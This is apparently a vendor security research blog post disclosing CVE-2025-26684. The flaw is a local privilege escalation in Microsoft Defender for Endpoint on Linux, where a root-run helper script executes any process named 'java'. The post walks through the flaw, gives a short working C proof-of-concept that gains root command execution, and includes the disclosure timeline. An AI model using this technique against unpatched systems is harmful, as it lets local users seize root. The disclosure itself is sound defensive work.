Stratascale’s Cybersecurity Research Unit (CRU) recently discovered an elevation of privilege vulnerability in Microsoft Defender for Endpoint on Linux and disclosed the vulnerability to the Microsoft Security Response Center (MSRC) who assigned it CVE-2025-26684 and released a fix.
Microsoft Defender for Endpoint (MDE) is a comprehensive enterprise endpoint security platform designed to help organizations prevent, detect, investigate, and respond to advanced threats. It safeguards a wide range of devices, including Windows and Mac client computers, Windows and Linux servers, as well as iOS and Android mobile devices. It provides various capabilities such as endpoint detection and response, threat protection, and posture management. Source: Microsoft Defender for Endpoint on Linux.
The Stratascale Cyber Research Unit (CRU) team discovered an elevation of privilege vulnerability in a helper script that is used to enumerate versions of software installed on the system.
| MDE for Linux Versions | ||
|---|---|---|
| Status | Build | Release Version |
| Remediated | May-2025 Build: 101.25032.0008 | TBD |
| Vulnerable | April-2025 Build: 101.25022.0002 | 30.125022.0001.0 |
| Vulnerable | March-2025 Build: 101.25012.0000 | 30.125012.0000.0 |
The MDE on Linux packages includes a Python helper script to enumerate versions of software installed and running on the system. A subset of the functionality inspects running Java processes that have instances of the Apache Log4j loaded to determine the version in use.
The /opt/microsoft/mdatp/conf/scripts/open_files.py help script executes at regular intervals and is spawned by the root owned wdavdaemon process. To determine the Java Runtime Environment (JRE) version, the open_files.py script looks for any processes named java or javaw. If found, it will execute java -version to determine the version.
Example output of what java -version would return.
An example usage statement was found at the top of the open_files.py script. The command was reformatted across multiple lines for readability. Note the –filter-command “java,javaw” option.
At the start of the script, a list of file handles (open files) is built by calling lsof_entries(), which is a wrapper function for list_open_file_handles().
The list_open_file_handles() function uses arguments passed into the script by the –filter-command.
This –filter-command arguments of “java,javaw” are passed into the following lsof command to find open files for any processes named java or javaw and then returns a list of process ids (PIDs).
The list of PIDs is passed to various functions to inspect environment variables, ports, and other information. The version of the JRE is determined by calling the grab_java_version() function.
The grab_java_version() function is where the vulnerability exists. The function determines the location of the java binary on disk by checking the /proc/<PID>/exe symbolic link and then executes the java -version command.
The problem is the java binary could be running from an untrusted location. A malicious local unprivileged user can create a process with the name java or javaw, which will eventually be executed with root privileges to determine the version of the JRE.
A manual walk-through of how the proof-of-concept exploit works. A process is created with the name java or javaw. The malicious “java” application also opens a file name with a log4j prefix which will make it look like the Apache log4j library is in use. The log4j pattern is determined by the –filter-name option.
The following is output from the lsof command that the open_files.py script will execute. A process named java is running from the /home/lowpriv/bin/install location and has a file named log4j-1.4.11.zip open. This satisfies the conditions of the script.
The open_files.py script has now found a java process with a log4j library open. One of the final checks is to execute java -version to determine the JRE version. Examining the /proc/<pid>/exe symbolic link shows that the java binary is a location under the control of the low privileged user at /home/lowpriv/bin/install/java. When the script executes the binary as root, arbitrary command execution as root is achieved.
The process listing output from the exploit stored in /woot.txt shows the process hierarchy and confirms the open_files.py script executed our malicious java binary as root.
Inspecting the parent process of the open_files.py script shows the wdavdaemon executed it.
Proof of concept code:
//////////////////////////////////////////////////////
// CVE-2025-26684 MDE Linux EoP
// by Rich Mirch @ Stratascale Cyber Research Unit
//////////////////////////////////////////////////////
// gcc -o java java.c -Wall
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
int main(void){
if(geteuid() == 0) {
system("ps -ef >/woot.txt");
} else {
FILE *fp;
fp = fopen("log4j-1.4.11.zip","w");
while(1) {
if (access("/woot.txt", F_OK) == 0) {
printf("/woot.txt found exploit success!\n");
fclose(fp);
exit(0);
}
sleep(15);
}
}
}
Microsoft resolved the issue by removing the vulnerable code. The following diff snippet between build versions v101.25022.0002 and v101.25032.0008 shows the grab_java_version() function was removed.
2025-03-18 Vulnerability submitted to MSRC
2025-03-19 MSRC opened a case for the issue
2025-04-08 Stratascale CRU asks MSRC if any additional information is needed
2025-04-09 MSRC replied, no details are needed at this time
2025-04-17 MSRC confirms the issue; assigned CVE-2025-26684.
2025-04-17 MSRC determines another researcher previously reported this issue, and this one will be considered a duplicate.
2025-05-06 Confirm with MSRC that it is okay to publish a blog on patch Tuesday
2025-05-07 Microsoft requests to review the draft blog to confirm technical accuracy
2025-05-08 Draft blog sent to MSRC for review
2025-05-09 MSRC acknowledged receipt of the draft blog and will provide technical feedback if needed
2025-05-13 Coordinated Public Disclosure
The CVE-2025-26684 MDE on Linux Elevation of Privilege vulnerability was discovered and reported to Microsoft by Rich Mirch of the Stratascale Cyber Research Unit.
Practical Guidance & Threat Intelligence
Stay a step ahead of the competition–and attackers–with fresh perspectives, practical guidance, and the latest threat intelligence.
To strengthen threat detection and accelerate compliance efforts, tool sprawl needs to be kept under control. Here are four steps to optimize your security tools and combat technology sprawl.
Learn how explainability, governance, and auditability in agentic AI systems help ensure safe, ethical, and accountable deployment while keeping innovation on track.
Our team shares key takeaways from Black Hat 2025, including why foundational security practices, AI governance, and insider threat management are more critical than ever for building resilience and aligning cybersecurity with business strategy.
To strengthen threat detection and accelerate compliance efforts, tool sprawl needs to be kept under control. Here are four steps to optimize your security tools and combat technology sprawl.
Learn how explainability, governance, and auditability in agentic AI systems help ensure safe, ethical, and accountable deployment while keeping innovation on track.
Our team shares key takeaways from Black Hat 2025, including why foundational security practices, AI governance, and insider threat management are more critical than ever for building resilience and aligning cybersecurity with business strategy.
